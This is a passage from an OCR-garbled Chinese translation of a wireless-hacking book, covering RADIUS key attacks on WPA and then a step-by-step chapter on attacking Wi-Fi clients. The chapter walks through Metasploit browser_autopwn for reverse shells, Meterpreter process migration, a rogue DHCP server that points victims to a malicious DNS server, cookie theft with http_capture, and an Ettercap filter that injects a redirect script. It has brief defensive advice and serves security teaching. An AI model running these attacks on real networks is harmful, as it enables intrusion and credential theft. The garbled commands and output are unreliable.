假设 攻击 者 成 功 地 获取 了 RADIUS 密 铀 ， 所 有 通过 RADIUS 服务 器 发 送 的 PMK 现 在 成 了 她 可 以 阅读 的 内 容 了 。 虽然 它们 在 发 
往 接 入 后 的 途中 (使 用 Microsoft 点 到 点 的 加 密 或 MPPE) 是 加 密 的 ， 但 所 有 攻击 者 都 要 对 RADIUS 密 钥 进 行 解密 。 


这 种 攻击 的 一 个 重要 的 细节 是 ， 你 不 能 发 动 针对 用 于 加 密 PMK (MPPE) 的 密码 攻击 。 事 实 上 ， 用 于 保护 PMK 的 加 密 方案 
是 无 天 崇 要 的 。 相 反 ， 你 可 以 利用 的 事实 是 RADIUS 密 钥 具 有 双重 功能 。RADIUS 密 钥 用 来 认证 接 入 点 和 RADIUS 服 务 器 之 间 的 
言 息 (即使 信息 与 密 钥 的 传送 无 关 ) 。RADIUS 密 钥 也 用 作 基 本 密 钥 对 传送 的 PMK 进 行 加 密 。 局 动 一 个 针对 RADIUS 使 用 的 咱 应 
认证 字段 的 、 成 功 的 MD5 暴 力 攻击 ， 你 残 可 以 获得 RADIUS 密 铀 ， 而 且 ， 解 密 PMK 的 能 力 正 被 免费 地 传送 。 这 是 一 个 为 什么 相 
同 的 密 钥 绝 不 能 用 于 身份 认证 和 加 密 的 很 好 例子 。 


假设 攻击 者 可 以 以 某 种 噢 探 万 式 获 得 PMK (最 好 是 实时 获得 ) ， 那 么 她 现在 可 以 推导 出 任何 用 户 的 PTK。 显 然 ， 攻 击 者 殉 
可 以 在 友 送 数据 包 的 时 候 对 用 尸 的 数据 包 进 行 解密 。 她 还 可 以 在 不 允许 用 尸 完成 一 个 从 网 络 上 断 开 的 完整 操作 时 ， 而 尝试 断 开 用 
户 。 如 果 攻 击 成 功 ， 她 可 以 模拟 用 户 ， 并 获得 对 网 络 的 访问 。 


即使 攻击 者 位 于 能 嗅 探 出 和 破解 PMK 的 奇怪 位 置 ， 她 也 会 因为 某 种 原因 而 不 能 迅速 将 它们 找 出 来 ， 但 她 仍然 可 以 做 大 量 的 
破坏 活动 。 例 如 ,攻击 者 可 以 传输 一 个 星期 的 PMK 值 到 异地 的 服务 器 ， 并 在 同一 时 间 里 嗅 探 所有 的 无 线 通 信 数 据 包 。 每 周一 
次 ,攻击 者 用 嗅 探 到 的 通信 数据 包 组 合成 PMK， 并 解密 它 。 


最 后 ， 昌 然 攻 击 的 细节 超出 了 本 书 的 泡 围 ， 但 了 解 一 个 设备 的 RADIUS 密 钥 可 能 会 给 攻击 者 管理 该 设备 的 能 力 。 如 果 设 备 之 
间 使 用 相同 的 共享 密 钥 ， 那 么 攻击 者 可 以 潜在 地 管理 所 有 你 的 AP。 可 以 思考 一 下 ， 所 有 这 些 将 破解 一 个 单一 的 MD5 散 列 。 


图 侧 hpMK 传 送 


不 竹 的 是 ， 这 种 攻击 没有 快速 的 应 对 办 法 。 最 有 效 的 万 法 之 一 是 将 所 有 的 RADIUS 通信 数据 包 放 到 IPsec 隧道 (在 RADIUSs 标 
准 中 ， 这 只 是 一 些 具体 建议 ， 而 不 是 强制 要 求 ) 中 。 不 笠 的 是 ， 几 乎 没有 产品 文 持 这 样 做 。 


其 他 建议 包括 为 每 一 台 设 备 使 用 唯一 的 RADIUS 共享 密 铀 ， 虽 然 这 对 管理 员 来 说 是 真正 头痛 的 事 ， 但 减少 实际 拥有 RADIUS 
共享 密 钥 的 设备 数量 ， 可 以 使 网 络 更 易于 维护 。 所 谓 的 瘦 AP 是 将 大 多 数 AP 的 大 脑 放 到 一 个 集中 的 开 天 上 也 是 有 帮助 。 最 后 ,不 
用 说 ， 你 应 该 选择 位 数 长 的 和 随机 的 RADIUS 密 钥 ， 如 下 图 所 显示 的 那样 。 如 果 能 周期 性 地 轮换 也 将 是 明智 的 。 
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Cancel Changes | 


4.5 ”本 章 小 结 


本 草 涵 蓄 了 针对 WPA 的 所 有 已 知 攻击 。WPA 所 提供 的 增强 的 安全 性 大 大 优 于 其 前 映 (WEP) 。 这 些 改进 提高 了 价格 ， 这 是 
由 802.11 协 议 涉及 的 复杂 性 所 导致 的 。 竹 运 的 是 ， 这 种 复杂 性 对 于 最 终 用 户 是 透明 的 ， 任 何 现代 的 操作 系统 连接 到 一 个 由 WPA 
保护 的 网 络 与 连接 到 一 个 由 WEP 保 护 的 网 络 一 样 简单 。 


第 二 部 分 “攻击 802.11 的 客户 病 


案例 研究 : 运行 在 不 安全 的 电波 上 


在 饮用 冰镇 拿 铁 咖啡 (latte) 的 时 候 ，Datrwin 看 了 看 时 间 。 不 知 怎 的 ， 他 比 预 期 提前 30 分 钟 赶 到 星巴克 (Statbucks) 咖啡 
厅 ， 这 让 他 有 机 会 可 以 补充 点 食物 。 不 幸 的 是 ，Datwin 的 iPhone 手机 目前 正 因 为 多 次 解锁 尝试 失败 而 处 于 锁定 状态 。 因 此 ， 如 果 
他 想 浏览 网 页 ， 他 需要 打开 笔记 本 电脑 来 访问 。 


Darwin 启 动 Ubuhtu 系 统 ， 并 登录 后 ， 他 跳 过 了 Slashdot 册 的 头条 新 闻 (不 认真 的 家 伙 ， 这 次 Linux 操 作 系 统 只 出 现 了 桌面 的 界 
面 ) 。 一 旦 发 现 有 新 的 修复 版 本 ，Darwin 就 将 他 的 外 置 无 线 网 卡 的 设置 框 弹 出 ， 并 把 它 设置 成 监控 模式 。 启 动 Kismet 程 序 ， 随 后 
就 可 以 看 到 在 信道 6 上 有 几 个 不 同 的 网 络 ， 其 中 两 个 还 是 不 加 轿 的 。 这 为 他 在 指定 的 信道 上 一 次 提供 了 一 大 群 目标 ， 所 以 他 配置 
了 一 下 Kismet， 让 其 锁定 到 信道 6， 并 打开 另 一 个 终端 。 


Datwin 现 在 局 动 Hamstef 和 Fettet 两 个 程序 ， 把 它们 设置 为 监控 模式 接口 ， 然 后 看 着 数据 包 计 数 开 始 递增 。 很 快 ，Hamstet 就 截 
获 到 有 人 正在 进行 HTTP 会 话 的 认证 。Darwin 不 知道 这 个 人 下 一 步 想 做 什么 : 阅读 电子 邮件 ? 某 人 在 Amazon (亚马逊 ) 网 站 上 网 
购 的 历史 ?Darwin 按 电子 邮件 的 链接 提示 操作 了 一 下 ， 只 见 对 方 一 阵 鼠 标点 击 之 后 ， 看 到 他 正在 阅读 某 人 的 Yahoo (雅虎 ) 电子 
邮件 。 他 一 边 重 置 受害 者 的 Facebook (脸谱 ) 认证 证 书 ， 一 边 想 : “什么 时 候 Yahoo 能 赶 上 谷歌 ， 并 局 用 完整 的 SSL 支 持 呀 ? 


也 就 在 这 个 时 候 ， 他 意识 到 他 要 面试 的 申请 人 快要 出 现 了 。 他 导出 他 的 cookies 文 件 站 到 安全 的 地 方 ， 然 后 想 了 一 些 聪 明 的 面 
斌 问题。 最 后 一 件 他 所 担心 的 事 是 断 开 连接 ，Darwin 知 道 很 少 会 有 人 会 在 访问 结束 后 断 开 网 络 应 用 的 连接 。 


[1] Slashdot 是 创办 于 1997 年 的 一 个 著名 的 科技 新 闻 网 站 ， 它 的 稿件 都 是 由 读者 投稿 ， 编 辑 审 核 后 发 表 。 该 网 站 的 特色 在 于 它 的 读 
者 留言 ， 通 常情 况 下 ， 每 条 新 闻 有 几 百 条 读者 留言 ， 多 的 可 以 达到 上 千 条 ， 甚 至 几 千 条 ， 留 言 比 新 闻 本身 提 供 更 多 的 信息 ， 许 多 
人 都 是 为 了 看 留言 而 访问 该 网 站 。 译 者 注 

[2] 一 种 通过 浏览 器 在 客户 端 记 录 数 据 的 一 种 方式 ， 主 要 记录 用 户 关 于 所 访问 网 站 的 私人 信息 ， 如 该 人 在 什么 时 候 ， 访 问 过 该 网 


译 者 注 


站 多 少 次 。 


第 5 章 ”攻击 802.11 的 无 线 客 户 山 


最 近 ， 随 着 采用 WPA 的 增多 ， 攻 击 802.11 网 络 已 变 得 更 加 困难 。 以 前 那 种 只 要 假 以 时 日 就 可 以 攻破 802.11 网 络 的 日 子 已 经 
一 去 不 复 返 了 。 这 种 攻击 上 的 困难 导致 黑客 对 攻击 802.11 客 户 端 ， 而 不 是 攻击 网 络 产生 了 更 大 的 兴趣 


客户 端 攻击 是 独特 的 ， 因 为 它们 往往 发 生 在 协议 栈 的 多 个 层次 中 。 在 最 上 层 是 应 用 层 的 攻击 。 这 些 是 大 家 看 惯 了 的 忠告 
QuickTime 软 件 中 的 bugl1、Flash 软 件 中 的 bug 等 。 吸 引 客 户 端 攻击 兴趣 的 不 是 这 么 多 的 用 来 获得 代码 执行 的 “bug 时 代 ” 
而 是 向 攻击 者 提供 操作 客户 端 数 据 通 信 所 需要 的 协议 层 的 控制 。 这 些 常见 的 方式 包括 : 钓鱼 、DNS 动 持 、ARP 欺 骗 。 


本 章 市 你 训 析 一 个 客户 端 攻击 。 我 们 将 从 协议 最 高 层 (应 用 层 ) 的 攻击 开始 ， 然 后 同 下 层 展开 。 本 章 结 束 时 ， 你 束 会 有 一 个 
完整 的 理解 ， 从 而 知道 攻击 中 某 一 操作 友 生 在 协议 栈 的 哪 一 层 上 ， 以 及 什么 工具 负责 这 样 的 控制 操作 。 


[1] bug， 早 期 主要 指 软 硬件 中 的 设计 或 编程 中 的 错误 ， 现 在 还 包括 了 设计 缺陷 并 可 以 被 用 来 进行 网 络 攻击 的 漏洞 。 译 者 注 


5.1 ”攻击 应 用 层 


本 章 上 半 部 分 友 生 在 一 个 典型 的 家 庭 网 络 中 ， 网 络 中 的 IP 地 址 范围 是 10.0.1.1~10.0.1.24。 我 们 的 Linux 攻 击 主机 iP 地址 是 
10.0.1.9， 所 有 客 尸 疾 的 默认 网 天 是 10.0.1.1 (如 图 5-1 所 示 ) 。 在 本 节 中 ， 我 们 是 通过 802.11 还 是 通过 以 太 网 连接 网 天 是 无 天 紧 
要 的 。 在 本 章 的 后 半 部 分 ， 我 们 详细 前 述 了 特殊 的 802.11 攻 击 ， 该 攻击 可 以 有 效 地 和 本 节 摘 述 的 基本 MITM 方 法 合并 在 一 起 。 


兮 ”应 用 层 的 攻击 


1 1 
上 
10 
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在 一 个 典型 的 客户 端 攻 击 中 ， 攻 击 者 从 应 用 程序 级 漏洞 中 获得 代码 的 执行 。 这 些 类 型 漏洞 的 包括 : CVE-2009-0519 (这 是 
Adobe 公 司 的 Flash 播 放 器 中 的 一 个 缺陷 ) 和 CVE-2008-5353 (这 是 Java 反 序列 化 引擎 中 的 一 个 有 趣 的 缺陷 ) 。 本 节 主 要 解释 
Metasploit 的 browser autopwn 功 能 ， 而 不 是 攻击 上 述 这 种 特定 的 bug， 因 为 后 者 永远 都 只 是 一 个 暂时 的 办 法 ， 它 的 bug 随 着 
软件 的 升级 而 消失 。 


Internet 


10.0.1.1 


10.0.1.x 


图 5-1 受害 者 网 络 的 布局 


注 : 攻击 者 左上 角 企 鹅 图 标 表示 Linux 操 作 系 统 ; 受害 者 左上 角 图 标 表示 OSX 和 \Windows 操 作 系 统 。 


安装 Metasploit 


下 面 的 部 分 肖 盖 了 有 关 下 载 最 新 的 Metasploit 的 摘 述 ， 其 中 包括 一 些 可 选 功能 ， 如 pcaprub 和 ruby-lorcon。 二 者 都 用 于 


802.11 数 据 包 注入 和 捕获 。 这 里 的 演示 假设 你 已 经 下 载 并 安 半 了 最 新 的 lorcon (目前 的 版 本 是 2) 。 有 效 的 下 载 地 址 是 : 
https://802.11ninja.net/svn/lorcon/trunk, 


提示 。 其 中 的 README 文 件 包含 了 程序 的 详细 说 明 ， 以 避免 万 一 你 遗漏 了 那 一 条 先决 条 件 ， 如 ]orcon 本 身 或 tuby-dev。 


首先 ， 检 查 最 新 的 Metasploit 的 子 版 本 号 : 
[ ~] $svn co http://metasploit.com/svn/framework3/trunk msf3 


其 次 ， 编 译 连接 外 部 ruby-lorcon 的 外 部 模块 : 


[~]$ cd msf3/external/ruby-lorcon?2/ 
[~/msf3/external/ruby-lorcon?2]s$ ruby extconf.rb make g&& Sudo make install 


随后 ， 编 译 连 接 pcaprub 模 块 : 


[~/msf3/external/ruby-lorcon?2]$ cd ../pcaprub/ 


[~/msf3/external/pcaprub]ls ruby extconf .rb && make && sudo make install 


你 需要 在 本 次 会 话 期 间 (这 是 管理 员 用 户 的 一 种 特权 操作 ) 绑 定 到 80 端 口 ， 所 以 你 必须 以 root 用 户 启动 msfconsole 程 序 : 


[~/msf3/external/pcaprub]s$ cq 二 


[~/msf/msf3/trunk]s$ sudo ./msfconsole 


browser autopwn 的 用 法 


Metasploit 的 browser_autopwn 功 能 是 一 个 模块 ， 该 模块 可 以 方便 地 将 大 部 分 客户 端 bug 以 Metasploit 树 结构 的 方式 展示 
出 来 。 要 启动 browser autopwn， 我 们 输入 : 


msf > Use auxiliary/server/browser autopwn 


下 一 步 ,我们 设置 一 些 全 局 AUTOPWN 选 项 ， 这 些 常 量 参 数 将 被 其 他 模块 在 随后 引用 。 


setog AUTOPWN HOST 10.0.1.9 
setog AUTOPWN PORT 32525320 
setog AUTOPWN URI /ads 


主机 (AUTOPWN HOST) 和 应 口 (AUTOPWN PORT) 这 两 个 选项 明确 地 襄 明 了 AUTOPWN 服 务 将 运行 在 哪 台 主机 上 。 
按 通 常 惯例 ， 你 可 能 认为 应 该 是 端口 80， 但 我 们 随后 要 使 用 别 的 端口 。AUTOPWN _URI 选 项 详细 说 明了 特殊 的 URL， 它 是 我 们 
为 了 获得 弹出 将 客户 问 友 送 到 的 一 个 地 址 。 此 URL 应 是 无 害 的 ， 如 /ads。 随 着 全 局 选项 已 设置 ， 我 们 需要 设置 两 个 局 部 选项 


3et SRVPORT 22220 


set URIPATH /ads 


这 些 局 部 选项 用 于 browser_ autopwn 模 块 。 最 后 ， 我 们 告知 AUTOPWN 模 块 哪里 指向 我 们 的 反 向 连接 的 shell 程 序 : 


T 10.0.1.9 
set LPORT 45000 


现在 是 启动 browser autopwn 的 时 候 了 


msf auxiliary (browser autopwn)} > run 


[*] Auxiliary module runnindg a3 background job 
msf ri autopwn) > 

[*] Starting exploit modules on host 10.0.1.9... 
[过 二 


[*] Starting exploit multi/browser/firefo 
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payloadgeneric/shell reverse tcp 


[*] -—-—— Done, found 1l1 exploit mo 
[*] Using URL: http://0.0.0.0:555 
~ 


[|] L656alL: LES lleperi itUsG Ds 


正如 你 从 输出 信息 中 所 看 到 的 ， 这 个 版 本 的 Metasploit 装 载 了 11 个 独特 的 客户 端 漏洞 。 如 果 可 以 以 某 种 方式 把 受害 主机 指 
向 http://10.0.1.9:55550/ads， 那 么 AUTOPWN 模 块 将 在 可 能 的 范围 内 自动 检测 客户 端 ， 并 发 送 一 个 可 能 的 漏洞 。 该 客户 端 是 
使 用 JavaScript 和 User-Agent (用 户 代 理 ) 解析 的 版 本 。 


使 用 最 新 版 本 (但 显然 不 是 最 新 的 ) 的 Mac 主 机 ， 如 果 我 手动 使 Safari 指 向 AUTOPWN 服 务 器 ， 那 么 它 会 友 送 给 我 一 
个 .mov 文 件 。 如 果 我 打开 该 文件 ， 那 么 可 以 得 到 以 下 关于 msfconsole 的 公告 : 


*] Request '/ads' from 10.0.1.100:60355 
[*] Request '/ads?s3essid=TWFjTINYONnVuUuZGVmaW51Z2DplbmR1lzmluZWQ62WA4tdxXM6O 
INha2mFyaToO0L AUuMzo%3d" from 10.0.1.100:60325 


[*] Javascript Report: MacOSX:undefined:undefined:en-—-us::3aftari:4.0.3: 

[*] No database, Using targetcache instead 

[*] Responding with exploits 
add1ing: ee (defilated 14% 
adding: MACOSX/. 4GJjKCrg9 .mo (qd 


3 | 
[*] Command shell session 1 opened (10.0.1.9:54816 -> 10.0.1.100:60454) 
太 棒 了 ! 我 们 刚刚 得 到 一 个 shell。 让 我 们 用 参数 session-1 检 查 会 话 列 表 : 
yy(browser autopwn) > sessions 一 
1] Command shell O00.0.1.9:54816 -> 1]0.0.1 .100:60454 


现在 束 用 Session-i 转 换 到 弹出 的 Mac: 


msf auxiliary (browser autopwn) > sessions -1 1 
[*] Starting interaction with 1... 
id 
uid=501 (johnycsh) gid=20 (staff) 
groups=z0 (staff),10l1 (com.apple.sharepoint .group.1)},38( lpadmin)}.,81 
( appserveradm) ,102 (com.apple.sharepoint.group.2}, 19( appserverusr), 


B80 (admin) 


注意 一 个 完整 的 章节 涵盖 了 与 弹出 OS X 对 话 框 有 关 的 重要 情节 ， 请 参阅 第 6 章 。 


同样 的 ， 如 果 我 将 一 个 过 时 的 XP 对 话 框 指向 这 个 有 恶 的 URL 地 址 ， 那 么 我 会 在 msfconsole 上 得 到 如 下 的 输出 : 


[*] Regquest “ads from :10.0.1.7:1203 

[*] Sending Microsoitt Internet Explorer Data Binding Memory Corruption 
Init .HPME to TO GL FeLi234, ws 

Le 

下 


Heap spray mode 


[*] Sending stage (118336 bytes) 
[*] Meterpreter session 2 opened (10.0.1 .9:54046 -> 10.0.1.71:1248) 


太 棒 了 ! 另 一 个 shell， 让 我 们 检查 一 下 : 


msf auxiliary (browser autopwn) > Sess3ions -1 2 
[下 | Starting linteraction with. 之 

meterpreter > getpid 
CUurrent plid: 384 
meterpreter: BS 
Proocess List 
EL Name Path 
220 Explorer .EXE CGC: \WINDOWS\Explorer .EXE 

316 SpooOl3V .exe C:\WINDOWS\system32\s3poolsv.exe 
384 IEXPLORE .EXE C:\Program i CL Explorer\IEXPLORE .EXE 


看 起 来 我 们 能 够 在 |E 里 执行 代码 了 。 经 验 告诉 我 ， 用 户 很 可 能 厌烦 了 IE 一 贯 如 此 滑 稿 的 表现 (浏览 器 通 单 会 在 做 各 类 操作 的 
时 候 ， 为 了 它 的 扒 (heap) 操作 而 消耗 大 量 内 人 存 ) ， 所 以 在 IE 中 的 线程 被 用 尸 杀 死 之 前 ， 把 meterpeter 会 话 迁 移 到 一 个 更 诱 人 
的 主机 进程 中 : 


meterpreter > migrate 31¢6 
[*] Migrating to 316... 


[*] Migraticon completed successfully. 

现在 ,我 们 迁移 到 了 一 个 相对 安全 的 进程 (spoolsv) 中 ， 当 用 户 杀 死 浏览 器 时 ， 我 们 也 不 必 担 心 会 同时 杀 死 我 们 的 
meterpreter 会 话 。 

提示 。 在 一 个 被 破坏 的 Windows 对 话 框 上 所 执行 的 一 系列 令 人 兴奋 的 操作 ， 请 参阅 第 7 章 。 


我 们 对 这 些 例子 的 兴趣 很 显然 不 是 可 以 弹出 一 个 故意 指向 屎 意 网 页 的 客 己 新， 而 是 AUTOPWN 模 块 设法 上 自动 检测 哪些 客户 
山上 正在 使 用 ， 然 后 束 可 以 友 送 适当 的 攻击 和 有 效 载 何 。 不 是 处 理 特定 的 漏洞 ， 人 至 于 本 章 其 余部 分 ， 我们 只 是 使 用 


browser_autopwn 模 块 。 在 我 们 走向 弹出 客 尸 端的 过 程 中 ， 下 一 步 的 操作 是 从 手动 让 受害 者 去 访问 进攻 网 页 中 摆脱 出 来 ， 要 做 
到 这 一 点 ， 我 们 需要 通过 控制 他 们 的 DNS 来 完成 。 


5.2 ”使 用 一 个 牙 涉 的 DNS 服 务 器 攻击 客户 端 


要 想 让 他 们 发 送 他 们 的 DNS 数 据 包 到 我 们 所 控制 的 服务 器 ， 引 领受 害 者 信服 地 访问 我 们 预 设 的 恶意 网 页 是 一 种 流行 方式 。 
还 有 一 种 方式 是 利用 XSRF 漏 洞 远程 攻击 一 个 路 由 器 的 网 络 接口 。 在 这 两 种 技术 中 ， 无 论 哪 一 种 都 能 利用 你 所 希望 的 任何 城 
(domain) 。 因 此 ， 当 用 户 输入 www.cnn.com 时 ， 她 可 以 被 重 定 癌 到 你 预 设 的 收 恶 页面 。 本 节 介 绍 如 何 设置 一 个 DHCP 服 务 
器 。 本 章 后 面 将 详细 解释 XSRF 技 术 。 


仿 ” 通 过 DHCP 设 置 恶 意 的 DNS 


3 ~ 


Metasploit 当 前 还 没有 集成 到 假 的 DHCP 中 。 我 们 需要 目 己 手动 安装 和 配置 。 手 运 的 是 ，DHCP 服 务 器 是 一 个 轻 量 级 的 服务 
器 ， 所 以 配置 起 来 并 不 麻烦 。 下 面 的 命令 将 在 标准 的 Linux 命 令 行 上 安 妆 一 个 PHCP 服 务 器 : 


[~]$ sudo bash 


[~]# apt-get install dhcp3-server 


默认 情况 下 ，Ubuntu 需 要 我 们 重启 系统 后 才 会 执行 这 一 操作 。 我 们 可 以 用 下 面 的 命令 避免 重启 操作 : 


[~]# update-rc.d -f dhcp3-server remove 

[~]# cd /etc/dhcp3 

[/etc/dhcp3]# mv dhcpd.conf dhcpd.conf.stock 
[/etc/dhcp3]# vim dhcpd.contf 


然后 ， 你 将 需要 制作 一 个 dhcpd 文 件 ， 步 骤 看 起 来 和 下 面 的 类 似 : 


opticon domain-name—-servers 10.0.1.9; 

#the domain-name-server should obviously be your evil DNS sever 
deftault-lease-time 60; 

max—-lease-time /2} 

ddns-update-style none,} 

authoritatijve; 

lJog-—facility Jocali; 


subnet 10.0.1 .0 netmask 2250.259.250.0 1 

range 10.0.1 .100 10.0.1.200; 

option routers 10.0.1.1:; 

#in this case our ip was 10.0.1.9, your IP will almost certainly vary 


option domain-name—-servers 10.0.1.9; 


你 需要 关注 的 事情 是 网 络 的 子 网 和 关联 的 IP 地 址 。 该 地 址 范围 为 10.0.1.0~10.0.1.24。 一 定 要 适当 地 修改 配置 文件 ,一旦 设 
置 完 毕 ， 就 可 以 在 前 人 台 运 行 DHCP 服 务 器 。 


[root@phoenix: /etc/dhcp3]$ dhcpd3 -cf ./dhcpd.conf -d 


Internet Systems Consortium DHCP Server V3.1.1 
Sending on LPF /eth0O/00:cO0:9f:c3:af:05/10.0.1/24 


现在 ， 如 果 在 该 子 网 上 的 用 户 请 求 一 个 DHCP lease (DHCP 租 约 ) 认证 (或 者 无 线 客 己 端 天 联 ， 或 者 有 线 客户 端 开 机 等 操 
作 ) ，DHCP 服 务 器 会 与 一 个 合法 的 DHCP 服 务 器 进入 一 场 竞 赛 。 经 验 表 明 ，Linux 的 PHCP 服 务 器 通 弟 会 赢得 这 场 比赛 。 这 种 结 
果 可 能 是 由 于 大 多 数 SOHO 路 由 器 的 功率 相对 较 低 ， 或 者 是 由 于 企业 级 DHCP 服 务 器 通过 广域网 链接 的 往返 时 间 相对 慢 。 如 果 你 
发 现 目 己 输 掉 这 场 比 赛 ， 那 么 优化 dhcpd 快 速 反 应 可 能 对 你 的 时 间 是 一 个 有 价值 的 投资 。 


人 @ 亚 意 DHCP 服 务 器 应 对 措施 


你 不 仅 不 可 以 验证 DHCP/BOOTP 的 通信 数据 包 ， 而 且 也 没有 很 好 的 可 供 选 择 的 办 法 。 避 免 遭 遇 一 个 坏 的 DNS 服 务 器 的 最 简 
单 的 方法 是 静态 设置 DNS 服务 器 。 在 非常 小 的 网 络 上 ， 静 态 分 配 |P 地 址 可 能 是 实用 的 ， 但 对 于 中 等 规模 的 网 络 来 说 ， 这 个 任务 
将 是 不 可 能 的 。 


生 ” 运行 来 自 Metasploit 的 收 恶 的 DNS 服务 器 


/LN 


然 我 们 已 经 设置 了 DHCP 服 务 器 ， 那 么 我 们 需要 在 用 户 请 求 一 个 DHCP 地 址 租约 之 前 运行 一 个 邪恶 的 DNS 服务 器 。 运 行 


运行 最 


简单 的 DNS 服务 器 是 内 置 在 Metasploit 上 的 。 


Metasploit 有 一 个 只 是 用 于 | 临时 场合 的 简单 的 DNS 服务 器 模块 。 默 认 情 况 下 ， 访 服务 器 会 使 客户 端 重 定 向 到 指定 的 地 址 。 
从 msfconsole 上 局 动 该 服务 器 很 简单 : 


msf auxiliary (browser autopwn) > Use auxiliary/server/fakedns 
msf auxiliary (lfakedns) > TU 


[*] Auxiliary module running as background Job 


我 们 现在 需要 做 的 是 等 待 客户 端 续 订 一 个 DHCP 租 约 。 当 有 DHCP 租 约 出 现时 ， 我 们 将 在 我 们 的 DHCP 服 务 器 窗口 中 看 到 以 
下 类 似 的 内 容 : 


DHCPDISCOVER from O00:0e:39::69::0c9: 


DHCPOFFER on 10.0.1.100 to O00:0e:35:e89:c9:5b (grumblosaurus) via eth0 
DHCPREQUEST for lO.0.1.100 (10.0.1.93) from U0:0e:3:e9:c9:2b (grumblosaurus) 
via eth0 

DHCPACK on 10.0.1 .100 to O00:0e:3:e9:c9:50b {grumblosaurus) via eth0) 


随即 ， 我 们 可 能 会 看 到 一 些 诸如 下 面 的 DNS 查 询 ， 


*] DNS lJ0.0.1.2:24 
2 


27 XID 5624 (IN::A update.microsoft .com) 
[去 ] DNS 10.0.1.2:5321 


13/ ID 49062 (IN: :A safebrowsing.clients.google.com) 


[*] DNS 10.0.1.100:1081 XID 59478 (IN::A Www.google.com) 
[*] DNS 10.0.1.100:108] XID 33409 (IN::A fxfeeds.mozilla.com) 
DNS 1]0.0.1]1.100:1081 XID 19025 (IN: :A www.Sslashdot.org) 


到 目前 为 止 看 起 来 还 不 错 ， 但 当 用 户 浏览 到 Slashdot 时 会 发 生 什 么 ? 不 幸 的 是 ， 并 不 是 很 多 。 哩 然 DNS 被 重 定向 ， 但 我 们 
的 AUTOPWN 服 务 器 侦 听 55550 端 口 ， 而 不 是 80 端 口 。 此 时 ， 受 害 者 正 试图 连接 到 一 个 关闭 的 端口 。 


我 们 现在 需要 的 是 在 端口 80 进 行货 听 ， 处 理 任意 的 URL 重 定 同 到 我 们 的 AUTOPWN 模 块 。 实 现 这 一 功能 的 模块 称 为 
http capture: 


msf auxiliary (fakedns) > use auxiliary/server/capture/http 


因为 我 们 已 经 设置 了 全 局 的 AUTOPWN 选 项 ， 所 以 这 个 模块 不 需要 新 的 配置 : 


msf auxiliary (http} > run 


[*] Auxiliary module running as background job 


大 


提示 http_captute 模 块 有 窃取 用 户 的 cookies、 定 制 标题 等 多 个 先进 功能 。 检 查 选 项 和 data/exploits/captufe/http/index.html 文 
件 ， 就 可 以 开始 了 。 


现在 ， 当 用 户 浏览 到 某 个 页 面 时 ，DNS 将 他 重 定向 到 我 们 的 闯 口 80，http_capture 模 块 将 与 他 进行 交互 。http_capture 将 
害 者 提供 一 个 页 面 ， 页 面包 括 以 下 内 容 : 


为 受 
一 个 定位 到 data/exploits/captute/http/index.html 文 件 的 模板 。 
` 一 个 指向 AUTOPWN 模 块 的 HTMIL 语 言 的 <iframe> 页 面 元 素 。 


` 一 系列 <iframe> 形 式 的 表单 提交 页 面 : http://www.someservice.com:80/forms.html。 


当前 模板 是 一 个 相当 讨厌 的 黑白 色 的 “Loading ( 载 入 中 ) .…… ”信息 ， 如 下 所 示 。 你 或 者 可 以 通过 编辑 该 文件 ， 或 者 设置 
模板 选项 使 之 指向 别 的 页 面 来 改变 或 更 换 它 。AUTOPWN 中 的 iframe 很 显然 是 用 于 在 客户 端 弹 出 一 个 新 窗口 ， 随 后 的 一 系列 
iframe 是 为 你 提供 了 窃取 尽 可 能 多 的 cookies 的 一 个 高 明 的 技巧 。 


A Hotel Guest Wireless Services - Windows Internet... \ 


下 和 
E 


b= yy ™ | 用 | http:ifwwwslashdot, I ?| A 

File Edit Wew Favorites Tools Help 
3 了 [ 六 
np 化 Hotel Guest Wireless 5Servi,,， {= 


咎 - » 局 中 Internet 100% ” 


Web 浏 虎 器 通 贡 不 愿意 返回 Cookies 到 一 个 脚本 中 ， 除 非 该 脚本 源 目 同一 个 域 的 服务 器 ， 这 融 是 所 谓 的 朋 。 我 们 可 以 
绕 过 这 一 原则 是 ， 因 为 我 们 就 是 DNS 服 务 器 ， 所 以 束 浏 览 器 而 言 ， 对 于 每 个 cookies 请 求 ， 我 们 是 相同 的 源 〈 例 如， 受害 者 认为 


我 们 融 是 www.google.com，www.ebay.com 等 ) 。 
下 面 是 以 前 显示 弹出 的 客户 端 生 成 的 一 个 输出 片段 : 


[*] HTTP REQUEST 10.0.1 .102 > www.3lashdot.org:80 GET / Windows IE i.0 
[*] HTTP 10.0.1.102 attempted to download an ActiveX control 
[*] Sending exploit HIML to 10.0.1 .102:206060 token=start... 


[*] Heap spray mode 


下 

y 
[*] Sending stage (718336 bytes) 
[*] Meterpreter 


r session 1 opened (10.0.1 .8:64102 -> 10.0.1.102:2619) 


3 


避免 这 种 攻击 的 最 实际 的 办 法 是 静态 设置 DNS 服务 器 。 虽 然 这 种 技术 不 一 定 会 阻止 攻击 ， 但 它 能 使 攻击 速度 慢 下 来 。 当 对 
方 意识 到 DNS 请 求 是 到 一 个 固定 IP 的 服务 器 时 ， 对 方 也 会 相应 地 调整 他 的 网 络 设置 。 静 态 DNS 服 务 器 的 好 处 是 : 静态 DNS 服务 
器 与 静 仿 ARP 的 设置 ( 它 在 很 大 程度 上 是 不 可 行 的 ) 不 同 ， 这 种 设置 通常 不 会 引起 很 多 麻烦 。 


5.3 ”Ettercap 文 持 内 容 修改 


获取 源 地 址 和 目的 地 址 之 间 的 通信 数据 包 的 另 一 项 技术 是 ARP 其 骗 。ARP 和 欺骗 的 选择 工具 是 Ettercap 软 件 。 


鸭 ” 和 ARP 欺 骗 和 内 容 注入 


| 3 


Ettercap 广 泛 支持 插件 和 模块 ， 并 可 以 容易 地 用 来 强制 客户 端 访问 我 们 的 http_capture 模 块 。 我 们 将 使 用 Ettercap 过 滤器 做 
这 件 事 情 : 


[~]# cat Javascript inject.etter 


ft (ip.PpProto == TCP && tcp.dst == 80) 
| 
1 (search (DATA.data, "Accept-Encoding")) 
1 
replace ("Accept-Encoding", "Accept—Rubbish!").,; 
msg ("changed Accept-Encoding!\n").; 
| 


该 过 滤器 的 第 一 部 分 对 从 浏览 器 发 出 的 HTTP 请 求 进行 检测 ， 并 破坏 浏览 器 已 接收 的 代码 ， 阻 止 服务 器 利用 回复 中 的 压缩 内 
容 ， 令 注入 操作 变 得 不 可 行 。 


replace ("<BODY™, "&#x000D<BODY 
onload=\"JjJavascript:document.location.href=" 
http://10.0.1.9/dbclick.html'\"><xXSS a=").; 

replace ("<body", "&#x000D<body 
